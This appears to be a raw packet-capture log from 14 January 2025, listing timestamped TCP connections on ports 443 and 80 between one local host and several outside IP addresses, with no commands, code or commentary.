                                Jan 14, 2025 04:33:02.741035938 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.741108894 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.741122961 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.741755009 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.741822958 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.741837978 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.772972107 CET44349751203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.773122072 CET49751443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.773153067 CET44349751203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.773184061 CET44349751203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.773236036 CET49751443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.774350882 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.776485920 CET49751443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.776515007 CET44349751203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.781310081 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.781404972 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.781420946 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.781457901 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.781548023 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.781622887 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.781837940 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.781866074 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.791889906 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.791901112 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.791948080 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.791985989 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.792049885 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.792078018 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803090096 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803101063 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803170919 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.803203106 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803366899 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803376913 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.803428888 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.803443909 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813010931 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813019991 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813107967 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.813169956 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813630104 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813638926 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813674927 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813704014 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.813731909 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.813760042 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.815181017 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.815190077 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.815248013 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.815264940 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825042009 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825053930 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825123072 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.825145960 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825361013 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825370073 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825423956 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.825426102 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825480938 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825503111 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.825557947 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825567961 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825632095 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.825649977 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825704098 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825746059 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825757980 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.825773001 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.825800896 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.826102018 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.826163054 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.826176882 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.826339006 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.826395035 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.826409101 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.826809883 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.826875925 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.826890945 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827153921 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827227116 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.827239990 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827395916 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827452898 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.827466011 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827588081 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.827646017 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.827660084 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828145981 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828207970 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.828224897 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828322887 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828372002 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828378916 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.828393936 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828421116 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.828470945 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.828515053 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.828516006 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.829242945 CET49750443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.829267025 CET44349750203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.867616892 CET804974070.32.23.62192.168.2.4
                                Jan 14, 2025 04:33:02.867806911 CET4974080192.168.2.470.32.23.62
                                Jan 14, 2025 04:33:02.869736910 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.878717899 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.878727913 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.878757000 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.878802061 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.878863096 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.899496078 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.899504900 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.899559975 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.899688005 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.899688959 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.900013924 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.900023937 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.900180101 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.900180101 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.900250912 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.900919914 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.900964022 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.901082039 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.901082039 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.901149988 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902239084 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902309895 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.902326107 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902373075 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902441025 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.902453899 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902481079 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.902527094 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.912802935 CET4974080192.168.2.470.32.23.62
                                Jan 14, 2025 04:33:02.914455891 CET49754443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.914519072 CET44349754203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.917691946 CET804974070.32.23.62192.168.2.4
                                Jan 14, 2025 04:33:02.928234100 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.928323030 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.928481102 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.934860945 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.934941053 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.935204983 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:02.935240984 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:02.935328960 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:02.935458899 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:02.935472965 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:02.936832905 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.936897039 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.936959982 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.937154055 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.937171936 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.940608025 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.940644979 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:02.940699100 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.940879107 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:02.940903902 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.370781898 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.371211052 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.371278048 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.372390985 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.372749090 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.372864008 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.372931957 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.414402962 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.414654016 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.414716959 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.416204929 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.416379929 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.416455984 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.418476105 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.418638945 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.418665886 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.418735027 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.463027000 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.463088036 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.511020899 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.531069994 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.531342030 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.531403065 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.533098936 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.533181906 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.533463955 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.533608913 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.533623934 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.533709049 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.539545059 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.539716959 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.539896011 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.541615009 CET49758443192.168.2.4172.67.74.152
                                Jan 14, 2025 04:33:03.541659117 CET44349758172.67.74.152192.168.2.4
                                Jan 14, 2025 04:33:03.543405056 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.543597937 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.543658018 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.546348095 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.546824932 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.546845913 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.547471046 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.547540903 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.547606945 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.547831059 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.548037052 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.548078060 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.548118114 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.548156023 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.548172951 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.548203945 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.554369926 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:03.554411888 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:03.554476023 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:03.554701090 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:03.554719925 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:03.573875904 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.573936939 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.589318991 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.591406107 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.619569063 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.797041893 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.797111034 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.797131062 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.797202110 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.797276020 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.797310114 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.810127974 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.810195923 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.810220957 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.810453892 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.810453892 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.810532093 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.844465971 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.862746000 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.862786055 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.862803936 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.862837076 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.862874985 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.862900019 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.863065004 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.876219034 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.876250982 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.876272917 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.876413107 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.876413107 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.876413107 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.876492023 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.876632929 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.876724958 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.883594990 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.883615971 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.883697033 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.883697987 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.883766890 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.884577036 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.884594917 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.884634972 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.884656906 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.884680033 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.885518074 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.885561943 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.885579109 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.885591984 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.885618925 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.925431967 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.949774981 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.949810982 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.949827909 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.949969053 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.949970007 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.950047016 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.966445923 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.966475010 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.966574907 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.966605902 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970572948 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970603943 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970755100 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970773935 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970773935 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.970844030 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.970890045 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.970890999 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.970890999 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.971585989 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.971651077 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.971667051 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.972503901 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.972569942 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.972584009 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.973517895 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.973579884 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.973592997 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.974340916 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.974404097 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.974416018 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.996588945 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:03.996670008 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:03.996732950 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.015995026 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.019736052 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.030785084 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.030802011 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.030881882 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.030898094 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.036439896 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.036550045 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.036618948 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.056612015 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.056688070 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.056715965 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057198048 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057199955 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.057207108 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057311058 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.057311058 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.057321072 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057363033 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057384968 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057455063 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.057475090 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057528973 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.057790041 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057811022 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057842016 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.057861090 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.057871103 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.058353901 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.058383942 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.058407068 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.058413029 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.058432102 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.058600903 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.058654070 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.058661938 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.059273958 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.059369087 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.059376001 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.059464931 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.059516907 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.059523106 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.060132027 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.060192108 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.060198069 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.060326099 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.060379028 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.060384989 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061002970 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061069012 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.061075926 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061180115 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061232090 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.061238050 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061896086 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.061948061 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.061954021 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.062062979 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.062114954 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.062120914 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.062299013 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.062341928 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.082498074 CET49756443192.168.2.4203.161.57.139
